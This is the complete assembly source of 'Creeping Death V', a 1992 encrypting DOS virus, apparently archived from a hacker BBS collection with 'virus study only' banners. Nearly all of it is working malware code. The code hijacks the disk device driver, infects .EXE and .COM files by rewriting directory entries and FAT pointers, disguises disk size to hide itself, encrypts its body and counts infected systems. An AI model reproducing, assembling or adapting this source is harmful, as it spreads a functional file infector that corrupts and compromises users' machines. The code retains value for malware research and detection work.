home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / SOURCE.ZIP / CDSET5.ASM < prev    next >
Assembly Source File  |  1992-10-11  |  24KB  |  662 lines

  1. ;****************************************************************************;
  2. ;                                                                            ;
  3. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  4. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  5. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  6. ;                     -=]                            [=-                     ;
  7. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  8. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  9. ;                     -=]   CoSysOp: Northstar Ken   [=-                     ;
  10. ;                     -=]                            [=-                     ;
  11. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  12. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  13. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  14. ;                                                                            ;
  15. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  16. ;                                                                            ;
  17. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  18. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  19. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  20. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  21. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  22. ; Is. Keep This Code in Responsible Hands!                                   ;
  23. ;                                                                            ;
  24. ;****************************************************************************;
  25.  
  26. ;*****************************************************************************;
  27. ;                                                                             ;
  28. ; Creeping Death V (Encrypting, try to find it)                               ;
  29. ;                  (Version 4 bug Fixed)                                      :
  30. ; (c) Copyright 1992 by Bit Addict                                            ;
  31. ;                                                                             ;
  32. ;*****************************************************************************;
  33.  
  34. code segment public 'code'
  35.         assume    cs:code, ds:code, es:code
  36.         org    5ch
  37.  
  38. ;*****************************************************************************;
  39. ;                                                                             ;
  40. ; Data                                                                        ;
  41. ;                                                                             ;
  42. ;*****************************************************************************;
  43.  
  44. BPB_Buf:    db    32 dup(?)        ; buffer for BPB
  45. EncryptWrite2:    db    36 dup(?)        ; Encrypt DoRequest Encrypt
  46.  
  47. Request        equ    this dword        ; address of the request header
  48. RequestOffset    dw    ?
  49. RequestSegment    dw    ?
  50.  
  51.             org    100h
  52.  
  53. ;*****************************************************************************;
  54. ;                                                                             ;
  55. ; Actual start of virus. In this part the virus initializes the stack and     ;
  56. ; adjusts the device driver used by dos to read and write from floppy's and   ;
  57. ; hard disks. Then it will start the orginal exe or com-file                  ;
  58. ;                                                                             ;
  59. ;*****************************************************************************;
  60.  
  61. Encrypt:    mov    si,offset Main-1
  62.         mov    cx,400h-11
  63. Repeat:        xor    byte ptr [si],0
  64.         inc    si
  65.         loop    Repeat
  66.  
  67. Main:        mov    sp,600h            ; init stack
  68.         inc    Counter
  69.  
  70. ;*****************************************************************************;
  71. ;                                                                             ;
  72. ; Get dosversion, if the virus is running with dos 4+ then si will be 0 else  ;
  73. ; si will be -1                                                               ;
  74. ;                                                                             ;
  75. ;*****************************************************************************;
  76.  
  77. DosVersion:    mov    ah,30h            ; fn 30h = Get Dosversion
  78.         int    21h            ; int 21h
  79.         cmp    al,4            ; major dosversion 
  80.         sbb    di,di
  81.         mov    byte ptr ds:drive[2],-1    ; set 2nd operand of cmp ah,??
  82.  
  83. ;*****************************************************************************;
  84. ;                                                                             ;
  85. ; Adjust the size of the codesegment, with dos function 4ah                   ;
  86. ;                                                                             ;
  87. ;*****************************************************************************;
  88.  
  89.         mov    bx,60h            ; Adjust size of memory block
  90.         mov    ah,4ah            ; to 60 paragraphs = 600h bytes
  91.         int    21h            ; int 21h
  92.  
  93.         mov    ah,52h            ; get internal list of lists
  94.         int    21h            ; int 21h
  95.  
  96. ;*****************************************************************************;
  97. ;                                                                             ;
  98. ; If the virus code segment is located behind the dos config memory block the ;
  99. ; code segment will be part of the config memory block making it 61h          ;
  100. ; paragraphs larger. If the virus is not located next to the config memory    ;
  101. ; block the virus will set the owner to 8h (Dos system)                       ;
  102. ;                                                                             ;
  103. ;*****************************************************************************;
  104.  
  105.         mov    ax,es:[bx-2]        ; segment of first MCB
  106.         mov    dx,cs            ; dx = MCB of the code segment
  107.         dec    dx
  108. NextMCB:    mov    ds,ax            ; ax = segment next MCB
  109.         add    ax,ds:[3]
  110.         inc    ax
  111.         cmp    ax,dx            ; are they equal ?
  112.         jne    NextMCB            ; no, not 1st program executed
  113.         cmp    word ptr ds:[1],8
  114.         jne    NoBoot
  115.         add    word ptr ds:[3],61h    ; add 61h to size of block
  116. NoBoot:        mov    ds,dx            ; ds = segment of MCB
  117.         mov    word ptr ds:[1],8    ; owner = dos system
  118.  
  119. ;*****************************************************************************;
  120. ;                                                                             ;
  121. ; The virus will search for the disk paramenter block for drive a: - c: in    ;
  122. ; order to find the device driver for these block devices. If any of these    ;
  123. ; blocks is found the virus will install its own device driver and set the    ;
  124. ; access flag to -1 to tell dos this device hasn't been accesed yet.          ;
  125. ;                                                                             ;
  126. ;*****************************************************************************;
  127.  
  128.         cld                ; clear direction flag
  129.         lds    bx,es:[bx]        ; get pointer to first drive
  130.                         ; paramenter block
  131.  
  132. Search:        cmp    bx,-1            ; last block ?
  133.         je    Last
  134.         mov    ax,ds:[bx+di+15h]    ; get segment of device header
  135.         cmp    ax,70h            ; dos device header ??
  136.         jne    Next            ; no, go to next device
  137.         xchg    ax,cx
  138.         mov    byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive 
  139.                         ; has not been accessed"
  140.         mov    si,offset Header-4    ; set address of new device
  141.         xchg    si,ds:[bx+di+13h]    ; and save old address
  142.         mov    ds:[bx+di+15h],cs
  143. Next:        lds    bx,ds:[bx+di+19h]    ; next drive parameter block
  144.         jmp    Search
  145.  
  146. ;*****************************************************************************;
  147. ;                                                                             ;
  148. ; If the virus has failed in starting the orginal exe-file it will jump here. ;
  149. ;                                                                             ;
  150. ;*****************************************************************************;
  151.  
  152. Boot:        mov    ds,ds:[16h]        ; es = parent PSP
  153.         mov    bx,ds:[16h]        ; bx = parent PSP of Parent PSP
  154.         xor    si,si
  155.         sub    bx,1
  156.         jnb    Exec
  157.         mov    ax,cs
  158.         dec    ax
  159.         mov    ds,ax
  160.         mov    cx,8
  161.         mov    si,8
  162.         mov    di,0ffh
  163. Count:        lodsb
  164.         or    al,al
  165.         loopne    Count
  166.         not    cx
  167.         and    cx,7
  168. NextByte:    mov    si,8
  169.         inc    di
  170.         push    di
  171.         push    cx
  172.         rep    cmpsb
  173.         pop    cx
  174.         pop    di
  175.         jne    NextByte
  176. BeginName:    dec    di
  177.         cmp    byte ptr es:[di-1],0
  178.         jne    BeginName
  179.         mov    si,di
  180.         mov    bx,es
  181.         jmp    short Exec
  182.  
  183. ;*****************************************************************************;
  184. ;                                                                             ;
  185. ; If none of these devices is found it means the virus is already resident    ;
  186. ; and the virus wasn't able to start the orginal exe-file (the file is        ;
  187. ; corrupted by copying it without the virus memory resident). If the device   ;
  188. ; is found the information in the header is copied.                           ;
  189. ;                                                                             ;
  190. ;*****************************************************************************;
  191.  
  192. Last:        jcxz    Exit
  193.  
  194. ;*****************************************************************************;
  195. ;                                                                             ;
  196. ; The information about the dos device driver is copyed to the virus code     ;
  197. ; segment                                                                     ;
  198. ;                                                                             ;
  199. ;*****************************************************************************;
  200.  
  201.         mov    ds,cx            ; ds = segment of Device Driver
  202.         add    si,4
  203.         push    cs
  204.         pop    es
  205.         mov    di,offset Header
  206.         movsw
  207.         lodsw
  208.         mov    es:StrBlock,ax
  209.         mov    ax,offset Strategy
  210.         stosw
  211.         lodsw
  212.         mov    es:IntBlock,ax
  213.         mov    ax,offset Interrupt
  214.         stosw
  215.         movsb
  216.  
  217. ;*****************************************************************************;
  218. ;                                                                             ;
  219. ; Deallocate the environment memory block and start the this file again, but  ;
  220. ; if the virus succeeds it will start the orginal exe-file.                   ;
  221. ;                                                                             ;
  222. ;*****************************************************************************;
  223.  
  224.         push    cs
  225.         pop    ds
  226.         mov    bx,ds:[2ch]        ; environment segment
  227.         or    bx,bx            ; =0 ?
  228.         jz    Boot
  229.         mov    es,bx
  230.         mov    ah,49h            ; deallocate memory
  231.         int    21h
  232.         xor    ax,ax
  233.         mov    di,1
  234. Seek:        dec    di            ; scan for end of environment
  235.         scasw
  236.         jne    Seek
  237.         lea    si,ds:[di+2]        ; es:si = start of filename
  238. Exec:        push    bx
  239.         push    cs
  240.         pop    ds
  241.         mov    bx,offset Param
  242.         mov    ds:[bx+4],cs        ; set segments in EPB
  243.         mov    ds:[bx+8],cs
  244.         mov    ds:[bx+12],cs
  245.         pop    ds
  246.         push    cs
  247.         pop    es
  248.  
  249.         mov    di,offset f_name    ; copy name of this file
  250.         push    di
  251.         mov    cx,40
  252.         rep    movsw
  253.         push    cs
  254.         pop    ds
  255.  
  256.         mov    ah,3dh            ; open file, this file will
  257.         mov    dx,offset File        ; not be found but the entire
  258.         int    21h            ; directory is searched and
  259.         pop    dx            ; infected
  260.  
  261.         mov    ax,4b00h        ; execute file
  262.         int    21h
  263. Exit:        mov    ah,4dh            ; get exit-code
  264.         int    21h
  265.         mov    ah,4ch            ; terminate (al = exit code)
  266.         int    21h
  267.  
  268. ;*****************************************************************************;
  269. ;                                                                             ;
  270. ; Installation complete                                                       ;
  271. ;                                                                             ;
  272. ;*****************************************************************************;
  273. ;                                                                             ;
  274. ; The next part contains the device driver used by creeping death to infect   ;
  275. ; directory's                                                                 ;
  276. ;                                                                             ;
  277. ; The device driver uses only the strategy routine to handle the requests.    ;
  278. ; I don't know if this is because the virus will work better or the writer    ;
  279. ; of this virus didn't know how to do it right.                               ;
  280. ;                                                                             ;
  281. ;*****************************************************************************;
  282.  
  283.  
  284. Strategy:    mov    cs:RequestOffset,bx
  285.         mov    cs:RequestSegment,es
  286.         retf
  287.  
  288. Interrupt:    push    ax            ; driver strategy block
  289.         push    bx
  290.         push    cx            ; save registers
  291.         push    dx
  292.         push    si
  293.         push    di
  294.         push    ds
  295.         push    es
  296.  
  297.         les    bx,cs:Request
  298.         push    es
  299.         pop    ds
  300.         mov    al,ds:[bx+2]        ; Command Code
  301.  
  302.         cmp    al,4            ; Input
  303.         je    Input
  304.         cmp    al,8            ; Output
  305.         je    Output
  306.         cmp    al,9
  307.         je    Output
  308.  
  309.         call    DoRequest
  310.  
  311.         cmp    al,2            ; Build BPB
  312.         jne    Return
  313.         lds    si,ds:[bx+12h]        ; copy the BPB and change it
  314.         mov    di,offset bpb_buf    ; into one that hides the virus
  315.         mov    es:[bx+12h],di
  316.         mov    es:[bx+14h],cs
  317.         push    es            ; copy
  318.         push    cs
  319.         pop    es
  320.         mov    cx,16
  321.         rep    movsw
  322.         pop    es
  323.         push    cs
  324.         pop    ds
  325.         mov    al,ds:[di+2-32]        ; change
  326.         cmp    al,2
  327.         adc    al,0
  328.         cbw
  329.         cmp    word ptr ds:[di+8-32],0    ; >32mb partition ?
  330.         je    m32            ; yes, jump to m32
  331.         sub    ds:[di+8-32],ax        ; <32mb partition
  332.         jmp    short Return
  333. m32:        sub    ds:[di+15h-32],ax    ; >32mb partition
  334.         sbb    word ptr ds:[di+17h-32],0
  335. Return:        pop    es            ; return to caller
  336.         pop    ds
  337.         pop    di
  338.         pop    si
  339.         pop    dx
  340.         pop    cx
  341.         pop    bx
  342.         pop    ax
  343.         retf
  344.  
  345. Output:        mov    cx,0ff09h        ; check if disk changed
  346.         call    check
  347.         jz    InfectSector        ; no, just infect sector
  348.         call    DoRequest        ; yes, write virus to disk
  349.         jmp    short inf_dsk
  350.  
  351. InfectSector:    jmp    _InfectSector        ; infect sector
  352. Read:        jmp    _Read            ; read sector
  353. ReadError:    add    sp,16            ; error during request
  354.         jmp    short Return
  355.  
  356. Input:        call    check            ; check if disk changed
  357.         jz    Read            ; no, read sector
  358. inf_dsk:    mov    byte ptr ds:[bx+2],4    ; yes, write virus to disk
  359.         cld                ; save last part of request
  360.         lea    si,ds:[bx+0eh]
  361.         mov    cx,8
  362. save:        lodsw
  363.         push    ax
  364.         loop    save
  365.         mov    word ptr ds:[bx+14h],1    ; read 1st sector on disk
  366.         call    ReadSector
  367.         jnz    ReadError
  368.         mov    byte ptr ds:[bx+2],2    ; build BPB
  369.         call    DoRequest
  370.         lds    si,ds:[bx+12h]        ; ds:si = BPB
  371.         mov    di,ds:[si+6]        ; size of root directory
  372.         add    di,15            ; in sectors
  373.         mov    cl,4
  374.         shr    di,cl
  375.         mov    al,ds:[si+5]
  376.         cbw
  377.         mov    dx,ds:[si+0bh]
  378.         mul    dx            ; ax=fat sectors, dx=0
  379.         add    ax,ds:[si+3]
  380.         add    di,ax
  381.         push    di            ; save it on stack
  382.         mov    ax,ds:[si+8]        ; total number of sectors
  383.         cmp    ax,dx            ; >32mb
  384.         jnz    more            ; no, skip next 2 instructions
  385.         mov    ax,ds:[si+15h]        ; get number of sectors
  386.         mov    dx,ds:[si+17h]
  387. more:        xor    cx,cx            ; cx=0
  388.         sub    ax,di            ; dx:ax=number is data sectors
  389.         sbb    dx,cx
  390.         mov    cl,ds:[si+2]        ; cx=sectors / cluster
  391.         div    cx            ; number of clusters on disk
  392.         cmp    cl,2            ; 1 sector/cluster ?
  393.         sbb    ax,-1            ; number of clusters (+1 or +2)
  394.         push    ax            ; save it on stack
  395.         call    Convert            ; get fat sector and offset in
  396.         mov    byte ptr es:[bx+2],4    ; sector
  397.         mov    es:[bx+14h],ax
  398.         call    ReadSector        ; read fat sector
  399. again:        lds    si,es:[bx+0eh]
  400.         add    si,dx
  401.         sub    dh,cl            ; has something to do with the
  402.         adc    dx,ax            ; encryption of the pointers
  403.         mov    word ptr cs:[gad+1],dx
  404.         cmp    cl,1            ; 1 sector / cluster
  405.         jne    Ok
  406. SmallModel:    not    di            ; this is used when the
  407.         and    ds:[si],di        ; clusters are 1 sector long
  408.         pop    ax
  409.         push    ax
  410.         inc    ax
  411.         push    ax
  412.         mov    dx,0fh
  413.         test    di,dx
  414.         jz    here
  415.         inc    dx
  416.         mul    dx
  417. here:        or    ds:[si],ax
  418.         pop    ax
  419.         call    Convert
  420.         mov    si,es:[bx+0eh]
  421.         add    si,dx
  422. Ok:        mov    ax,ds:[si]
  423.         and    ax,di
  424.         mov    dx,di            ; allocate cluster
  425.         dec    dx
  426.         and    dx,di
  427.         not    di
  428.         and    ds:[si],di
  429.         or    ds:[si],dx
  430.         cmp    ax,dx            ; cluster already allocated by
  431.         pop    ax            ; the virus ?
  432.         pop    di
  433.         mov    word ptr cs:[pointer+1],ax
  434.         je    _Read_            ; yes, don't write it and go on
  435.         mov    dx,ds:[si]
  436.         push    ds
  437.         push    si
  438.         mov    byte ptr es:[bx+2],8    ; write
  439.         call    DoRequest        ; write the adjusted sector to
  440.         pop    si            ; disk
  441.         pop    ds
  442.         jnz    _Read_
  443.         call    ReadSector        ; read it again
  444.         cmp    ds:[si],dx        ; is it written correctly ?
  445.         jne    _Read_            ; no, can't infect disk
  446.         dec    ax
  447.         dec    ax            ; calculate the sector number
  448.         mul    cx            ; to write the virus to
  449.         add    ax,di
  450.         adc    dx,0
  451.         push    es
  452.         pop    ds
  453.         mov    word ptr ds:[bx+12h],2
  454.         mov    ds:[bx+14h],ax        ; store it in the request hdr
  455.         test    dx,dx
  456.         jz    less
  457.         mov    word ptr ds:[bx+14h],-1
  458.         mov    ds:[bx+1ah],ax
  459.         mov    ds:[bx+1ch],dx
  460. less:        mov    ds:[bx+10h],cs
  461.         mov    ds:[bx+0eh],100h
  462.         mov    byte ptr es:[bx+2],8    ; write it
  463.         call    EncryptWrite1
  464.  
  465. _Read_:        mov    byte ptr ds:[bx+2],4    ; restore this byte
  466.         std                ; restore other part of the
  467.         lea    di,ds:[bx+1ch]        ; request
  468.         mov    cx,8
  469. load:        pop    ax
  470.         stosw
  471.         loop    load
  472. _Read:        call    DoRequest        ; do request
  473.  
  474.         mov    cx,9
  475. _InfectSector:    mov    di,es:[bx+12h]        ; get number of sectors read
  476.         lds    si,es:[bx+0eh]        ; get address of data
  477.         sal    di,cl            ; calculate end of buffer
  478.         xor    cl,cl
  479.         add    di,si
  480.         xor    dl,dl
  481.         push    ds            ; infect the sector
  482.         push    si
  483.         call    find
  484.         jcxz    no_inf            ; write sector ?
  485.         mov    al,8
  486.         xchg    al,es:[bx+2]        ; save command byte
  487.         call    DoRequest        ; write sector
  488.         mov    es:[bx+2],al        ; restore command byte
  489.         and    byte ptr es:[bx+4],07fh
  490. no_inf:        pop    si
  491.         pop    ds
  492.         inc    dx            ; disinfect sector in memory
  493.         call    find
  494.         jmp    Return            ; return to caller
  495.  
  496. ;*****************************************************************************;
  497. ;                                                                             ;
  498. ; Subroutines                                                                 ;
  499. ;                                                                             ;
  500. ;*****************************************************************************;
  501.  
  502. find:        mov    ax,ds:[si+8]        ; (dis)infect sector in memory
  503.         cmp    ax,"XE"            ; check for .exe
  504.         jne    com
  505.         cmp    ds:[si+10],al
  506.         je    found
  507. com:        cmp    ax,"OC"            ; check for .com
  508.         jne    go_on
  509.         cmp    byte ptr ds:[si+10],"M"
  510.         jne    go_on
  511. found:        test    word ptr ds:[si+1eh],0ffc0h ; file to big
  512.         jnz    go_on                ; more than 4mb
  513.         test    word ptr ds:[si+1dh],03ff8h ; file to small
  514.         jz    go_on                ; less than  2048 bytes
  515.         test    byte ptr ds:[si+0bh],1ch    ; directory, system or
  516.         jnz    go_on                ; volume label
  517.         test    dl,dl            ; infect or disinfect ?
  518.         jnz    rest
  519. pointer:    mov    ax,1234h        ; ax = viral cluster
  520.         cmp    ax,ds:[si+1ah]        ; file already infected ?
  521.         je    go_on            ; yes, go on
  522.         xchg    ax,ds:[si+1ah]        ; exchange pointers
  523. gad:        xor    ax,1234h        ; encryption
  524.         mov    ds:[si+14h],ax        ; store it on another place
  525.         loop    go_on            ; change cx and go on
  526. rest:        xor    ax,ax            ; ax = 0
  527.         xchg    ax,ds:[si+14h]        ; get pointer
  528.         xor    ax,word ptr cs:[gad+1]    ; Encrypt
  529.         mov    ds:[si+1ah],ax        ; store it on the right place
  530. go_on:        rol    word ptr cs:[gad+1],1    ; change encryption
  531.         add    si,32            ; next directory entry
  532.         cmp    di,si            ; end of buffer ?
  533.         jne    find            ; no, do it again
  534.         ret                ; return
  535.  
  536. check:        mov    ah,ds:[bx+1]            ; get number of unit
  537. drive:        cmp    ah,-1                ; same as last call ?
  538.         mov    byte ptr cs:[drive+2],ah    ; set 2nd parameter
  539.         jne    changed
  540.         push    ds:[bx+0eh]            ; save word
  541.         mov    byte ptr ds:[bx+2],1        ; disk changed ?
  542.         call    DoRequest
  543.         cmp    byte ptr ds:[bx+0eh],1        ; 1=Yes
  544.         pop    ds:[bx+0eh]            ; restore word
  545.         mov    ds:[bx+2],al            ; restore command
  546. changed:    ret                    ; return
  547.  
  548. ReadSector:    mov    word ptr es:[bx+12h],1        ; read sector from disk
  549.  
  550. DoRequest:    db    09ah            ; call 70:?, orginal strategy
  551. StrBlock    dw    ?,70h
  552.         db    09ah            ; call 70:?, orginal interrupt
  553. IntBlock    dw    ?,70h
  554.         test    byte ptr es:[bx+4],80h    ; error ? yes, zf = 0
  555.         ret                ; return
  556.  
  557. Convert:    cmp    ax,0ff0h        ; convert cluster number into
  558.         jae    fat_16            ; an sector number and offset
  559.         mov    si,3            ; into this sector containing
  560.         xor    word ptr cs:[si+gad-1],si    ; the fat-item of this
  561.         mul    si                ; cluster
  562.         shr    ax,1
  563.         mov    di,0fffh
  564.         jnc    cont
  565.         mov    di,0fff0h
  566.         jmp    short cont
  567. fat_16:        mov    si,2
  568.         mul    si
  569.         mov    di,0ffffh
  570. cont:        mov    si,512
  571.         div    si
  572.         inc    ax
  573.         ret
  574.  
  575. EncryptWrite1:    push    ds
  576.         push    cs
  577.         pop    ds
  578.         push    es
  579.         push    cs
  580.         pop    es
  581.         cld
  582.         mov    cx,12
  583.         mov    si,offset Encrypt
  584.         mov    di,offset EncryptWrite2
  585.         inc    byte ptr ds:[si+8]
  586.         rep    movsb
  587.         mov    cl,10
  588.         mov    si,offset DoRequest
  589.         rep    movsb
  590.         mov    cl,12
  591.         mov    si,offset Encrypt
  592.         rep    movsb
  593.         mov    ax,0c31fh
  594.         stosw
  595.         pop    es
  596.         jmp    EncryptWrite2
  597.  
  598. ;*****************************************************************************;
  599. ;                                                                             ;
  600. ; Data                                                                        ;
  601. ;                                                                             ;
  602. ;*****************************************************************************;
  603.  
  604. File:        db    "C:",255,0        ; the virus tries to open this
  605.                         ; file
  606.  
  607. Counter        dw    0            ; this will count the number of
  608.                         ; systems that are infected by
  609.                         ; this virus
  610.  
  611. Param:        dw    0,80h,?,5ch,?,6ch,?    ; parameters for the
  612.                         ; exec-function
  613.  
  614. Signature    db    'CREEPING DEATH 3'    ; Signature
  615.  
  616. Header        db    7 dup(?)        ; this is the header for the
  617.                         ; device driver
  618.  
  619. f_name:        db    ?            ; Buffer for the filename used
  620.                         ; by the exec-function
  621.  
  622. ;*****************************************************************************;
  623. ;                                                                             ;
  624. ; The End                                                                     ;
  625. ;                                                                             ;
  626. ;*****************************************************************************;
  627.  
  628. code ends
  629.  
  630. end Encrypt
  631.  
  632. ;****************************************************************************;
  633. ;                                                                            ;
  634. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  635. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  636. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  637. ;                     -=]                            [=-                     ;
  638. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  639. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  640. ;                     -=]   CoSysOp: Northstar Ken   [=-                     ;
  641. ;                     -=]                            [=-                     ;
  642. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  643. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  644. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  645. ;                                                                            ;
  646. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  647. ;                                                                            ;
  648. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  649. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  650. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  651. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  652. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  653. ; Is. Keep This Code in Responsible Hands!                                   ;
  654. ;                                                                            ;
  655. ;****************************************************************************;
  656.  
  657. ;─────────────────────────────────────────────────────────────────────────;
  658. ;──────────────────> and Remember Don't Forget to Call <──────────────────;
  659. ;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────;
  660. ;─────────────────────────────────────────────────────────────────────────;
  661.  
  662.